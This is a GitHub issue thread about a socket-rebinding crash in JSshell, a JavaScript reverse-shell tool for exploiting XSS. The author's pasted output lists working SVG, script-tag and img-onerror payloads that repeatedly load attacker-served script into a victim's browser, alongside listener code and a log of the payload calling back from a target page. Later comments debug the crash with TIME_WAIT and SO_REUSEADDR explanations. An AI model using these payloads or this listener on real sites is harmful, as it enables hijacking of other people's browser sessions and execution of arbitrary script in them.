shelld3v / JSshell

JSshell - JavaScript reverse/remote shell

Hey I got some errors .Help me if possible #1

Closed amvinayak closed 4 years ago

amvinayak commented 4 years ago

root@kali:/opt/JSshell# python3 jsh.py -s 192.168.91.129 -p 65001 -g
    __
  |(_  _ |_  _  |  |
\_|__)_> | |(/_ |  |
                      v2.0

Payloads:

Listening on [any] 65001 for incoming JS shell ...
Got JS shell from [192.168.91.1] port 61404 to kali 65001
Traceback (most recent call last):
  File "jsh.py", line 148, in <module>
    main()
  File "jsh.py", line 142, in main
    shell()
  File "jsh.py", line 75, in shell
    s.bind(('192.168.91.128', 65001))
OSError: [Errno 98] Address already in use

I tried changing the address and port but it didn't work.

shelld3v commented 4 years ago

Hi, sorry for that, let me check again 🌝

shelld3v commented 4 years ago

Hi @amvinayak, I think the problem is in the code (the address)! First, I want to ask: did you change anything in my code?

File "jsh.py", line 75, in shell
s.bind(('192.168.91.128', 65001))

==> In my code, the bind address is always 0.0.0.0. I think something has been changed here! Could you try to re-download/re-clone my app?

Here is my code:

def shell():
    form = b'''HTTP/1.1 200 OK
Content-Type: application/javascript
Connection: close
'''
    while 1:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(('0.0.0.0', port))
        if secs != 0:
            s.settimeout(secs)
        buffer = input('%sjs-2.0%s$ ' % (red, white))
        s.listen(2)

shelld3v commented 4 years ago

Make sure that you didn't clone a forked repo and then create an issue on the original repo 😠😠😠! Also sorry for my delay, since I forgot to check my email 😆😆😆

98Kstar commented 4 years ago

Hello, the same thing happened when I received a shell. I did not modify any of your code. Here is my error report:

Listening on [any] 4848 for incoming JS shell ...
Got JS shell from [8.210.182.90] port 55706 to fuckerduck 4848
js-2.0$

js-2.0$ Traceback (most recent call last):
  File "jsh.py", line 150, in <module>
    main()
  File "jsh.py", line 144, in main
    shell()
  File "jsh.py", line 76, in shell
    s.bind(('0.0.0.0', port))
OSError: [Errno 98] Address already in use

amvinayak commented 4 years ago

Brother, I tried your new code as well but it didn't work; the issue persists. If possible, help me out.

Thanks 😊 for your help anyway 😁


amvinayak commented 4 years ago

Also, after getting the shell it crashes, so please look at that specifically.


shelld3v commented 4 years ago

@98Kstar: Can you please choose another port number? "Address already in use" means the port on that IP address is already being used (by another program or something, maybe already listening).

@amvinayak Can you give me the traceroute (the error message):

Traceback (most recent call last):
...blah...blah (I need this)

98Kstar commented 4 years ago

@98Kstar: Please choose another port number! Address already in use indicates that the port on that IP address is already in use (by another program or something else, possibly already listening).

@amvinayak Can you give me the traceroute (error message):

Traceback (most recent call last):
...blah...blah (I need this)

It didn't work. After I tried multiple ports, I got that error as soon as I received the shell.

shelld3v commented 4 years ago

I think everything is working properly from my side as well:

root@shelld3vcomputer:~/JSshell$ python3 jsh.py -p 8484 -g -c 'confirm("It is worked")' -s 127.0.0.1
    __
  |(_  _ |_  _  |  |
\_|__)_> | |(/_ |  |
                      v2.0

Payloads:
 - SVG: <svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//127.0.0.1:8484"},999)>
 - SCRIPT: <script>setInterval(function(){with(document)body.appendChild(createElement("script")).src="//127.0.0.1:8484"},999)</script>
 - IMG: <img src=x onerror=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//127.0.0.1:8484"},999)>

Listening on [any] 8484 for incoming JS shell ...
Got JS shell from [127.0.0.1] port 30613 to shelld3vcomputer 8484
js-2.0$ confirm("It is worked")
js-2.0$ no crash :)
js-2.0$ var myvar = 'JSshell is runnning'
js-2.0$ var myvar2 = myvar + '!'; alert(myvar2 + ' :)))');
js-2.0$ help
JSshell using javascript code as shell commands. Also supports some commands:
help                  This help
domain                The source domain
pwd                   The source path
exit, quit            Exit the JS shell
js-2.0$ domain
localhost:4444
js-2.0$ pwd
/
js-2.0$ exit
root@shelld3vcomputer:~/JSshell$

shelld3v commented 4 years ago

I think I have understood something here, @98Kstar:

The first time, your JSshell was able to listen on port 4848, which means no program was using the port at that time. But after getting the shell, your JSshell tried to listen again and found that port 4848 was already in use. This may be the result of the first bind (listen); maybe your JSshell didn't close the connection before starting to listen again. I don't know why, but I have closed the connection in my code:

    if 'Accept' in resp and 'HTTP' in resp:
        print ('Got JS shell from [%s] port %s to %s %s' % (addr[0], addr[1], socket.gethostname(), port))
        for line in resp.split('\n'):
            if 'referer' in line.lower():
                referer = line.lower().replace('referer: ', '')
                domain = referer.split('/')[2]
                pth = '/'.join(referer.split('/')[3:])
                if pth == '\r':
                    pth = '/'
        if len(cmd):
            c.send(form + cmd.encode())
            print('%sjs-2.0%s$ %s' % (red, white, cmd))
        c.close()
        s.close()
        shell()

So can you try to re-download/re-clone my JSshell again @98Kstar, thank you! And I will investigate this issue further if the problem is still there.

shelld3v commented 4 years ago

Hey, I don't know, but this may be the root cause:

            c.send(form + buffer.encode())
            c.close()

I think I need to close s as well, not only c (s.close()). And I am going to update it now 🤟🤟🤟 please test it for me 😄😄😄 😆😆😆

shelld3v commented 4 years ago

Updated 🙃🙃🙃 Can you check the problem again after downloading this again 😀😀😀

shelld3v commented 4 years ago

Hi, has everything been fixed? Can you try to re-download and run my program? If everything is working well, I am going to close this now! 😀😀😀😀😀

amvinayak commented 4 years ago

Sorry, but nothing went well, bro. I reinstalled it three times. Actually the issue is with binding: it does not bind to ports easily. I hope you could contact me verbally, it would be great, and your concern for the family is appreciated.


shelld3v commented 4 years ago

Hi @amvinayak, I just updated my JSshell yesterday, can you please check again? 😊


@98Kstar How about you?

shelld3v commented 4 years ago

@amvinayak Why do you want to contact me verbally? Is there any problem outside of this issue? Also, where are you from? 😊

Ringx3 commented 4 years ago

awwww

js-2.0$ confirm("It is worked")
Traceback (most recent call last):
  File "jsh.py", line 151, in <module>
    main()
  File "jsh.py", line 145, in main
    shell()
  File "jsh.py", line 76, in shell
    s.bind(('0.0.0.0', port))
OSError: [Errno 98] Address already in use

shelld3v commented 4 years ago

@BonjourM3 When did you download/git it?

Ringx3 commented 4 years ago

today.

shelld3v commented 4 years ago

@BonjourM3 Hey, can I ask whether your first command (confirm("It is worked")) was executed in the browser?

Ringx3 commented 4 years ago

It executed in the browser...

shelld3v commented 4 years ago

@BonjourM3 Thank you for that, but I will need time to investigate and fix this, since everything is just running beautifully in my terminal, so I can't know what is happening on your side. If possible, you can give me some additional information (about your reproduction, maybe) that could help me! Also, what Python version are you using for this? (2 or 3)

amvinayak commented 4 years ago

Traceback (most recent call last):
  File "jsh.py", line 151, in <module>
    main()
  File "jsh.py", line 145, in main
    shell()
  File "jsh.py", line 76, in shell
    s.bind(('0.0.0.0', port))
OSError: [Errno 98] Address already in use

That's the error. I tried it with both python and python3, but nothing works; as I see it, it just doesn't support Kali. I wish you could connect via TeamViewer and have a look.


shelld3v commented 4 years ago

Hey everybody, I think the problem has actually been fixed now 😃😃😃 I got the solution after reading the Python socket documentation. It said:

close() releases the resource associated with a connection but does not necessarily close the connection immediately. If you want to close the connection in a timely fashion, call shutdown() before close().

Deeper:

Once a socket is no longer required, the calling program can discard the socket by applying a close subroutine to the socket descriptor. If a reliable delivery socket has data associated with it when a close takes place, the system continues to attempt data transfer. However, if the data is still undelivered, the system discards the data. Should the application program have no use for any pending data, it can use the shutdown subroutine on the socket prior to closing it.

In my situation, the socket had not been closed immediately yet. First, multiple processes can have a handle to the same underlying socket. Calling close() will decrease the handle count by one, and if the handle count reaches zero, as a natural process, the socket and associated connection go through the normal close procedure (effectively sending a FIN / EOF to the peer) and the socket is deallocated.

But if the handle count does not reach zero because another process still has a handle to the socket, then the connection is not closed and the socket is not deallocated.

Usually, a socket will only handle one process; example code is:

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
s.listen(0)
c, a = s.accept()
c.send(...)
c.close()
s.close()

The socket started listening with s.listen(0); then whenever a connection comes, it will accept it with c, a = s.accept() and no longer accept other connections. But if you look at my payloads:

<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//host:port"},999)>

You will see that it makes a loop that will create script tags with source host:port, 999 times. Any new script tag will make an HTTP request to the shell to get the JavaScript source, and in the first moments of the script-generating process it will create new scripts very fast (I don't know why; you can ask the person who made JavaScript). So that also means a lot of connections will be made to JSshell at almost the same time, and JSshell has accepted and handled many connections, or we can call them processes. Using only close() just stops one connection, but since other connections are still being kept, the socket has not been closed immediately yet. That's also why, when you enter a command, it will be executed many times in the browser.

And the fix is:


commit https://github.com/shelld3v/JSshell/commit/051b20259cdd57c0537e3c722dc267ef54bf5d94:

@@ -97,7 +97,9 @@ def shell():
                print(hp)

            c.send(form + buffer.encode())
+++         c.shutdown(socket.SHUT_RDWR)
            c.close()
+++         s.shutdown(socket.SHUT_RDWR)
            s.close()
        except KeyboardInterrupt:
            if sys.platform == 'win32':
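Review bot: the added `s.shutdown(socket.SHUT_RDWR)` on the listening socket `s` does not address the failure in the tracebacks above: the `EADDRINUSE` on the next `s.bind()` comes from the accepted connection `c` lingering in TIME_WAIT on that port after the server closes it first, which neither `shutdown()` nor `close()` on `s` removes, and `shutdown()` on a listening socket that was never connected can fail with `OSError` (ENOTCONN) on some platforms. Either set `s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)` before `s.bind()`, or bind and listen once and loop on `accept()` instead of rebinding per command. Separately, if `c.shutdown()` raises (for instance because the browser already reset the connection), the `c.close()` and `s.close()` after it are skipped; put the close calls in a `try/finally`.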

(I don't know whether I should shutdown() s or c, so I just do it for both 😆😆😆)

Can everyone confirm my fix?

Sorry for my bad English 😀

Ringx3 commented 4 years ago

Still the same error.

js-2.0$ confirm("It is worked")
Traceback (most recent call last):
  File "jsh.py", line 153, in <module>
    main()
  File "jsh.py", line 147, in main
    shell()
  File "jsh.py", line 76, in shell
    s.bind(('0.0.0.0', port))
OSError: [Errno 98] Address already in use

shelld3v commented 4 years ago

This is strange! You have updated my new commit, but the problem still exists? Let me check again, thanks!

Ringx3 commented 4 years ago

Yes,i have updated the JSshell.

shelld3v commented 4 years ago

@BonjourM3, I just made a new commit https://github.com/shelld3v/JSshell/commit/35ace5a00cdffeac0890cf54a8ad17974a7816a2 that changes the shutdown() type. Can you please re-download and test it? Thanks, oh god, I hope this time everything will be well! Sorry for the inconvenience of having to delete and download this many times.

Ringx3 commented 4 years ago

Still the same error as before. And it is my pleasure to test JSshell!

shelld3v commented 4 years ago

😒😒😒 😭😭😭😭😭 Thank you @BonjourM3. If the root cause that I guessed is correct and shutdown() does not solve the problem, there is another way to solve this, but it will make the shell slower! Even so, I won't do it now; I will fix some more things to test! Also, can I ask, when you execute confirm("It is worked"), how many times does the code get executed in your browser?

Ringx3 commented 4 years ago

Many times. "It is worked" will execute in the browser after I click the button.

shelld3v commented 4 years ago

@BonjourM3 That means the root cause that I guessed was correct. But it should be fixed since my new updates! I still don't know why, but I will investigate more. Also, is your wifi good? From your response, one of the most important reasons for this problem is that your WIFI was too strong 😄😄

Ringx3 commented 4 years ago

Sorry, I didn't understand the meaning of "is that your WIFI was too strong"... But I have tested JSshell on both wired and wireless networks. In addition, could you tell me how you judged that I tested the tool over a wireless network? 😄

shelld3v commented 4 years ago

Haha! I mean, your wired/wireless network is too fast! Paying $500 just for a good network connection is not the best option; it even breaks your JSshell 😆 I only paid a bit more than $50 for my home network. Also, why do you use JSshell? Finding blind XSS, trolling your friends, hacking the DoD, or just playing around ❓😊 (I already know that you are a CTF player)

Ringx3 commented 4 years ago

I'm interested in testing some new security tools, and I think JSshell may be useful for my bug hunting. 😆

shelld3v commented 4 years ago

OMG! I'm also a bug bounty hunter, welcome to the club! And if you are going to find blind XSS using my tool, I advise you to use the XSS Hunter service (free) instead: http://xsshunter.com (But that does not mean you can take back your star on my tool 🤣)

Ringx3 commented 4 years ago

thx!

Ringx3 commented 4 years ago

i think this issue should be closed. :)

shelld3v commented 4 years ago

Yep, but not today! I will ONLY CLOSE this when the issue has been resolved. Now, I am a little bit busy with my hacking job so the fixing process will be longer.

tyrantpedal commented 4 years ago

Maybe this will help. I also have this issue as of today. What I did notice is after I got the error, then I set up a netcat listener with the same port and as soon as I start it I get the following:

listening on [any] 4455 ...
connect to [192.168.119.173] from (UNKNOWN) [192.168.119.173] 37474
GET / HTTP/1.1
Host: 192.168.119.173:4455
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.11.1.73:8080/php/index.php?tg=posts&idx=List&forum=1&thread=1&post=1&flat=1
Connection: close

Each time I restart the nc listener I get the same thing. If I go remove the JavaScript payload from the target, it goes away. Could the issue be that the payload is being repeatedly loaded, trying to connect back to your listener?

shelld3v commented 4 years ago

@tyrantpedal Don't use netcat for this. JSshell is very different from netcat when used for this purpose. I have checked, and everything you said above is working as intended. It's how JSshell works (if you know JavaScript you will know why this is happening, by looking at the payload).

shelld3v commented 4 years ago

The problem is in the JSshell listener, which I'm investigating why it doesn't close all connections

tyrantpedal commented 4 years ago

I understand that. I was just trying to give you additional information that may (or may not) be helpful :)

shelld3v commented 4 years ago

Hello everybody, are you all doing well? 😃 I just updated some stuff in the code, hope it fixes the bug. Can you please recheck it? Thank you, and hope you are having a beautiful day 😀

loySoGxj commented 4 years ago

Add setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) after s = socket.socket(socket.AF_INET, socket.SOCK_STREAM). Having seen this in late August, I doubt that he knew of this issue. Enjoy your hacking life!
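
The rebind failure that shelld3v's root-cause comment above and loySoGxj's SO_REUSEADDR suggestion are both about, as an added example that is not JSshell's own code. The mechanism is TCP's TIME_WAIT: when the server side closes the accepted connection first, that connection keeps the local port for the TIME_WAIT period, and a fresh bind() to the same port fails with EADDRINUSE on Linux unless SO_REUSEADDR is set on both the old and the new socket. rebind_after_close reproduces JSshell's bind / accept / close / bind-again cycle over loopback, with and without the option; serve_with_one_listener shows the structural fix, binding once and calling accept() in a loop. The HTTP response body is a constructed stand-in for whatever command the operator types at the prompt, the port is chosen by the kernel, and the client side is simulated in-process rather than by a browser.

```python
import errno
import socket

# Constructed stand-in for the JavaScript JSshell sends back to each injected
# <script> tag (assumption: the real body is the command typed at the prompt).
RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: application/javascript\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"console.log(1)"
)


def _serve_once(listener):
    """Accept one connection, answer it, and close the server side first.

    Closing first is what leaves the accepted socket in FIN_WAIT/TIME_WAIT on
    the server, still holding the local port after close() has returned.
    """
    client = socket.create_connection(listener.getsockname())
    conn, _addr = listener.accept()
    conn.sendall(RESPONSE)
    conn.close()
    # Drain the reply before closing: a close() with unread data sends RST,
    # which would tear the server side down immediately and hide the problem.
    while client.recv(4096):
        pass
    client.close()


def rebind_after_close(reuse):
    """Mimic JSshell's per-command listener: bind, accept, close, bind again.

    Returns True if the second bind() on the same port succeeds and False if
    it fails with EADDRINUSE. With reuse=True, SO_REUSEADDR is set on both
    listeners; the accepted socket inherits it from the first one, and the
    kernel only waives the conflict when both sides carry the option.
    """
    first = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    if reuse:
        first.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    first.bind(("127.0.0.1", 0))  # let the kernel pick a free port
    first.listen(2)
    port = first.getsockname()[1]
    _serve_once(first)
    first.close()

    second = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    if reuse:
        second.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    try:
        second.bind(("127.0.0.1", port))
        return True
    except OSError as exc:
        if exc.errno != errno.EADDRINUSE:
            raise
        return False
    finally:
        second.close()


def serve_with_one_listener(count):
    """The structural fix: bind and listen once, then accept() in a loop.

    Nothing is rebound between connections, so EADDRINUSE cannot occur, and
    each of the repeated requests the setInterval payload produces is answered
    by its own accept() instead of racing a fresh bind(). Returns how many
    connections were served.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(("127.0.0.1", 0))
    listener.listen(16)
    served = 0
    try:
        for _ in range(count):
            _serve_once(listener)
            served += 1
    finally:
        listener.close()
    return served


if __name__ == "__main__":
    print("rebind without SO_REUSEADDR:", rebind_after_close(False))
    print("rebind with SO_REUSEADDR:   ", rebind_after_close(True))
    print("connections on one listener:", serve_with_one_listener(3))
```

On Linux, rebind_after_close(False) returns False and rebind_after_close(True) returns True; serve_with_one_listener(3) returns 3. Note that shutdown() on either socket changes nothing here, because the port is held by the TIME_WAIT entry, not by an open file descriptor, and that SO_REUSEADDR only lets the listener come back up: the browser-side payload keeps reloading the script every 999 ms regardless, so the listener has to be able to answer each of those requests.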

shelld3v commented 4 years ago

@loySoGxj Thank you for your help, will try!

shelld3v commented 4 years ago

Updated 🥰

shelld3v commented 4 years ago

I am closing it now, thank you for your help @loySoGxj